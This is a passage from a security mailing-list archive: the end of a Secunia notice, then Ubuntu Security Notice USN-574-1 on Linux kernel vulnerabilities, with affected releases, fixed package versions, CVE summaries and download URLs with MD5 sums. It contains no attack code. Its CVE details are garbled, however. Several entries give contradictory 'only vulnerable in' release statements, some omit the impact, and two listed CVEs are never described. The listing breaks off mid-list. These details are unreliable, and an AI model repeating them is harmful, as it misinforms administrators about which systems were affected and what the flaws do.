7.04\nhttp://secunia.com/product/14068/\nUbuntu Linux 6.10\nhttp://secunia.com/product/12470/\n\nDESCRIPTION:\nUbuntu has issued an update for the kernel. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. =========================================================== \nUbuntu Security Notice USN-574-1          February 04, 2008\nlinux-source-2.6.17/20/22 vulnerabilities\nCVE-2006-6058, CVE-2007-3107, CVE-2007-4567, CVE-2007-4849,\nCVE-2007-4997, CVE-2007-5093, CVE-2007-5500, CVE-2007-5501,\nCVE-2007-5966, CVE-2007-6063, CVE-2007-6151, CVE-2007-6206,\nCVE-2007-6417, CVE-2008-0001\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 6.10\nUbuntu 7.04\nUbuntu 7.10\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 6.10:\n  linux-image-2.6.17-12-386       2.6.17.1-12.43\n  linux-image-2.6.17-12-generic   2.6.17.1-12.43\n  linux-image-2.6.17-12-hppa32    2.6.17.1-12.43\n  linux-image-2.6.17-12-hppa64    2.6.17.1-12.43\n  linux-image-2.6.17-12-itanium   2.6.17.1-12.43\n  linux-image-2.6.17-12-mckinley  2.6.17.1-12.43\n  linux-image-2.6.17-12-powerpc   2.6.17.1-12.43\n  linux-image-2.6.17-12-powerpc-smp  2.6.17.1-12.43\n  linux-image-2.6.17-12-powerpc64-smp  2.6.17.1-12.43\n  linux-image-2.6.17-12-server    2.6.17.1-12.43\n  linux-image-2.6.17-12-server-bigiron  2.6.17.1-12.43\n  linux-image-2.6.17-12-sparc64   2.6.17.1-12.43\n  linux-image-2.6.17-12-sparc64-smp  2.6.17.1-12.43\n\nUbuntu 7.04:\n  linux-image-2.6.20-16-386       2.6.20-16.34\n  linux-image-2.6.20-16-generic   2.6.20-16.34\n  linux-image-2.6.20-16-hppa32    2.6.20-16.34\n  linux-image-2.6.20-16-hppa64    2.6.20-16.34\n  linux-image-2.6.20-16-itanium   2.6.20-16.34\n  linux-image-2.6.20-16-lowlatency  2.6.20-16.34\n  linux-image-2.6.20-16-mckinley  2.6.20-16.34\n  linux-image-2.6.20-16-powerpc   2.6.20-16.34\n  linux-image-2.6.20-16-powerpc-smp  2.6.20-16.34\n  linux-image-2.6.20-16-powerpc64-smp  2.6.20-16.34\n  linux-image-2.6.20-16-server    2.6.20-16.34\n  linux-image-2.6.20-16-server-bigiron  2.6.20-16.34\n  linux-image-2.6.20-16-sparc64   2.6.20-16.34\n  linux-image-2.6.20-16-sparc64-smp  2.6.20-16.34\n\nUbuntu 7.10:\n  linux-image-2.6.22-14-386       2.6.22-14.51\n  linux-image-2.6.22-14-cell      2.6.22-14.51\n  linux-image-2.6.22-14-generic   2.6.22-14.51\n  linux-image-2.6.22-14-hppa32    2.6.22-14.51\n  linux-image-2.6.22-14-hppa64    2.6.22-14.51\n  linux-image-2.6.22-14-itanium   2.6.22-14.51\n  linux-image-2.6.22-14-lpia      2.6.22-14.51\n  linux-image-2.6.22-14-lpiacompat  2.6.22-14.51\n  linux-image-2.6.22-14-mckinley  2.6.22-14.51\n  linux-image-2.6.22-14-powerpc   2.6.22-14.51\n  linux-image-2.6.22-14-powerpc-smp  2.6.22-14.51\n  linux-image-2.6.22-14-powerpc64-smp  2.6.22-14.51\n  linux-image-2.6.22-14-rt        2.6.22-14.51\n  linux-image-2.6.22-14-server    2.6.22-14.51\n  linux-image-2.6.22-14-sparc64   2.6.22-14.51\n  linux-image-2.6.22-14-sparc64-smp  2.6.22-14.51\n  linux-image-2.6.22-14-ume       2.6.22-14.51\n  linux-image-2.6.22-14-virtual   2.6.22-14.51\n  linux-image-2.6.22-14-xen       2.6.22-14.51\n\nAfter a standard system upgrade you need to reboot your computer to\neffect the necessary changes. \n\nDetails follow:\n\nThe minix filesystem did not properly validate certain filesystem\nvalues. If a local attacker could trick the system into attempting\nto mount a corrupted minix filesystem, the kernel could be made to\nhang for long periods of time, resulting in a denial of service. \nThis was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2006-6058)\n\nThe signal handling on PowerPC systems using HTX allowed local users\nto cause a denial of service via floating point corruption. This was\nonly vulnerable in Ubuntu 6.10 and 7.04. This was only\nvulnerable in Ubuntu 7.04. (CVE-2007-4567)\n\nThe JFFS2 filesystem with ACL support enabled did not properly store\npermissions during inode creation and ACL setting. Local users could\npossibly access restricted files after a remount.  This was only\nvulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-4849)\n\nChris Evans discovered an issue with certain drivers that use the\nieee80211_rx function. This was only\nvulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-4997)\n\nAlex Smith discovered an issue with the pwc driver for certain webcam\ndevices. A local user with physical access to the system could remove\nthe device while a userspace application had it open and cause the USB\nsubsystem to block. This was only vulnerable in Ubuntu 7.04. \n(CVE-2007-5093)\n\nScott James Remnant discovered a coding error in ptrace. \nThis was only vulnerable in Ubuntu 7.04 and 7.10. This was only vulnerable in Ubuntu 7.10. (CVE-2007-5501)\n\nWarren Togami discovered that the hrtimer subsystem did not properly\ncheck for large relative timeouts. (CVE-2007-5966)\n\nVenustech AD-LAB discovered a buffer overflow in the isdn net\nsubsystem. This issue is exploitable by local users via crafted input\nto the isdn_ioctl function. (CVE-2007-6063)\n\nIt was discovered that the isdn subsystem did not properly check for\nNULL termination when performing ioctl handling. (CVE-2007-6151)\n\nBlake Frantz discovered that when a root process overwrote an existing\ncore file, the resulting core file retained the previous core file\u0027s\nownership. (CVE-2007-6206)\n\nHugh Dickins discovered the when using the tmpfs filesystem, under\nrare circumstances, a kernel page may be improperly cleared. (CVE-2007-6417)\n\nBill Roman discovered that the VFS subsystem did not properly check\naccess modes. (CVE-2008-0001)\n\n\nUpdated packages for Ubuntu 6.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43.diff.gz\n      Size/MD5:  2088629 e6f2abefc3d6b741165ad85e3e12e1cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43.dsc\n      Size/MD5:     2324 dba618e1ef3933ef7b72f9ae0c2f2a04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1.orig.tar.gz\n      Size/MD5: 59339565 2e5451201e38e865cbc7b0717fa124a1\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-doc-2.6.17_2.6.17.1-12.43_all.deb\n      Size/MD5:  4507566 f3593f4794ecb3c76651d3ee5fa80765\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-kernel-devel_2.6.17.1-12.43_all.deb\n      Size/MD5:  1098296 620681fa48911c868638eb45a081ef19\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-source-2.6.17_2.6.17.1-12.43_all.deb\n      Size/MD5: 46084550 a000ec6ae14a1430b19961088773e415\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    28612 a364ed5ec4a61c86836d92df3e7d1671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    50500 93635a5be96568a0bcc013b0f9374828\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:     2446 7c308d57a11c0852c5c191b32db03543\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    40788 203ccc34e8d6ef08fefdb297f43660b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   113552 a08770e0ab9c5a095b3bbeb9aaa494b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    43992 045de726c19efd85aec0c58e19a4e206\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    54024 58805876572a665f4ee930dd031fe271\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   189510 3baf972b680afac6017d498d3139a1c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    40028 b7ba746a91d6ee3d22281d242ecb0cce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   167744 276c9cae47fea158f010c9e9e4f04cc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    60446 994cf3669c701f3e1336fdb0d80cac91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   154562 2957b41258642e256d453a061cc3d219\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   314684 65a235b5a3258afe62924d8d962bbdf4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   105984 3b483a47da6b7b974619982ed1dd1b0c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:  1904886 31043dbf63f7fff0a46a17b20969a62d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb\n      Size/MD5:   908872 f4a952f077d42bd99dac73248521c6f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.43_amd64.deb\n      Size/MD5:   913364 758d91637533ae5e080b637024f1681d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_amd64.deb\n      Size/MD5:  7430792 b3c5bf05fab75da55cd6a29e874452f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb\n      Size/MD5: 23811514 fff7d351088cfc95d13afb9e240773d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.43_amd64.deb\n      Size/MD5: 24390532 b8889d70f1eaa4ec8dc9d7feda1f6dc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.43_amd64.deb\n      Size/MD5:  2341466 5d5c42e611287c5867da6f9fe9517de9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.43_amd64.deb\n      Size/MD5:  2340116 a773aac3beb5aa0ef0630b95b321e88d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_amd64.deb\n      Size/MD5:  1772018 a783af129fea695b41510174eb43d345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    16788 34074cba4be650462232dca85e2104ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   279182 33e7fc01312168bfda6c2ed7e4847cc5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   256910 22dda36c134a86e4eab945493f568bd5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:  1048488 572cc74c21331f50cd46468bbe42e7c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:  2103834 7867da5294924f2329268a010acf50ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   164438 2d6b9ba760717b711528b7f729ec0c1b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    10502 544a81e351b9d9c14e56e924a6179c21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    93360 9d0dd71df54a14334a2d56df02dc70b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    52564 79d82bd8c45bad6f92fb6711786ed307\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    39814 e9213be66eca3f6b6d073e1a14f1a306\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    79820 8115473b2953a78a0b451d3aaaebc793\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:     6332 279d471ccb620dc327e808225c35de8e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:     9370 92f7e30eb7bb55cfa08198e141becd14\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    62724 0bf2ba4988f7361accbe6fe7f0e7fb6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   138620 ebca050307f87ac2d72ebd9bc689e7ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   115686 0531aaadc28eb1f9553f42d29e45cf7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    90614 b51479c44a516e3b7b1d9d6501351732\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:  1286186 7fd5738a9d02487f8205f7d4438df1c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    80588 1eaebfa015089b95fb4b33e0e3d54831\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    13478 2fc4ef01ba125ff2c58541f680aea075\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    76274 2e8780a4c9f01d284f0f1721b9e6a80b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    36064 240b896de4d9d3b6e3e9078400f8a9f3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   151840 65707cf2f8925a5a89c2e13ddcbf0c04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:    53542 5de4ee3697a7e239fcafdd39c68d045a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_amd64.udeb\n      Size/MD5:   323448 02893e9d497b071b0379937a81316fbb\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    21210 90bb4a1eaf048397151cda845fe401f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    23814 164eeb1b9f128c5ee852efcd0bf6f09f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    43878 d9456b9d963455fdd95955e31c92fb0b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    44472 9ca39b7bf2e0c126e56bd46095a5726c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   104800 51595b0395fd381c41d93570df72dffd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    49412 5666f98c8991e30887c9677c81f7a76d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:     2368 1cf01d58d7c70fa5dc5c1a3b7f796b0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:     2386 1bb0d2b50b6abcc517c8c1e591db1188\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    35304 880cdb09c2afcdf33ca40b9c13ddfc0b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    36730 dc104bd3c776255fc5738200b86ea3e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    98282 a4a2536dface30a86fb49f2d1747c95d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   103506 08dc4f5c3ff60ba0bc9db2a92f249b4b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    38464 0288c1b2739b79f239c2c398d7703a86\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    39218 ba8b176b541052598a6c82a842aea87c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    44262 cff486146f47b112da60140687965946\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    44668 21193a742cddbd1c62ad0fa7d5720ed8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   172766 643ad8c80d7e3beb34f5d1da62d867d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   175168 812aafb1b907e821f6d3c8d3f8d9b593\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    33752 f109ef9e5b987019de1e3cf0ec23bd5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    34712 dbb5e40f1ac6b1b8ff50740f04808a04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   140568 65b14145f46c5f5a4333231248f34bc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   143824 cf95c4ede04a08b6c7889e08348af8bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    51750 d58a3e4b7a2d9d0206cba67e5e3e3d35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    53178 ba13e94b724e38b9716dde36594f3bf0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   131596 36f23a4d5b41b318b4699931d286e5c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   139174 456392c847ef3b5e2a46b88361b49571\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   288332 01d4271ae5667e584bb797bb29fef703\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   290688 5118af753b583834e2c73607f511fdc7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   103544 baa598f64f024be463dee2c50a5f8e1b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   106708 a36aa0d353997b26fb31b9ead239fe78\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:  1737910 e5f7666e862b98a399f5344fdfdc2ed1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:  1803750 ee8687d07d5768fe7980155663d11132\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-386_2.6.17.1-12.43_i386.deb\n      Size/MD5:   910860 0466ac4f169db0b306b323ebb55fd8bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.43_i386.deb\n      Size/MD5:   914056 56b0539e10fcfe31da8ae9fa4d9e7975\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb\n      Size/MD5:   911722 6cceb0b5dfd5ac6b9104cb3e513e2556\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.43_i386.deb\n      Size/MD5:   919298 178db23c4a81c28891cdbc86d37d1b95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.43_i386.deb\n      Size/MD5:  7426150 d216c4ffcdeea0810aee0790f629da75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.43_i386.deb\n      Size/MD5: 22802810 31c622390efeb404063898f4491bbe0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.43_i386.deb\n      Size/MD5: 22935968 12f638d7c23cccfec9752ade307be1f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb\n      Size/MD5: 23746230 601e62d57735ba78526b4079d914a2d2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.43_i386.deb\n      Size/MD5: 23246944 0ef40430dd5d01c2aa4698af31c57bae\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.43_i386.deb\n      Size/MD5:  1962604 1175ac7b4ba79b7f305a1a74d931d5f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.43_i386.deb\n      Size/MD5:  2030506 2e920daca195cf289122fb8f41750737\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.43_i386.deb\n      Size/MD5:  2068164 f7978d05bfff5a44bdaa945784111614\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.43_i386.deb\n      Size/MD5:  2030120 7e20aee45239a29d630b21db08b20887\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.43_i386.deb\n      Size/MD5:  1772080 063d4574c54b2106c50fe2aa85e73ea9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    15368 96f76d56e018b60b3eaf0f698bf53b0b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:    15732 8a28056b915141194af890edf2a857cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   253320 62259e21984827827bb237207a3c434c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   263866 e515dace37d353b855decb1894c03526\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.43_i386.udeb\n      Size/MD5:   220356 d82fbe1807f427957d2240e4d6ee2de2\n    